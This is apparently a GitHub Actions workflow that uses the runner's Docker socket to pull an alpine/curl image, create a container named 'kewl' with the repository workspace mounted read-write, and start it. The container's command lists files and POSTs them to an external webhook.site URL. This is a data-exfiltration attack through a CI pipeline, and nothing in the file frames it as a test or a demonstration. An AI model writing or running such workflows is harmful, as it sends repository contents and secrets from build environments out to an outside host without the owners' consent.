on: push
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - run : |
          curl \
          -s \
          --unix-socket /var/run/docker.sock \
          "http:/v1.34/images/create?fromImage=alpine/curl&tag=latest" \
          -X POST \
          -H "Content-Type: application/json"
      - run : |
          curl \
          -s \
          --unix-socket /var/run/docker.sock \
          "http:/v1.34/containers/create?name=kewl" \
          -X POST \
          -H "Content-Type: application/json" \
          -d '{ "Image": "alpine/curl:latest", "AttachStdout": true,"Volumes": {"/home/runner/work/workflow-tester/workflow-tester":{"bind":"/home/runner/work/workflow-tester/workflow-tester","mode":"rw"}}, "Cmd": [ "ls","|", "curl","-X","POST","--data-binary @- https://webhook.site/a5f2df3f-89ee-409d-95fc-b093b6ecab55" ] }'
      - run : echo "Starting container... ."    
      - run : |
          curl \
          -s \
          --unix-socket /var/run/docker.sock \
          "http:/v1.34/containers/kewl/start" \
          -X POST \
          -H "Content-Type: application/json"
      - run : echo "end container...."    
      - run : curl --unix-socket /var/run/docker.sock http:/v1.34/containers/json
      
      #- uses: actions/checkout@v3
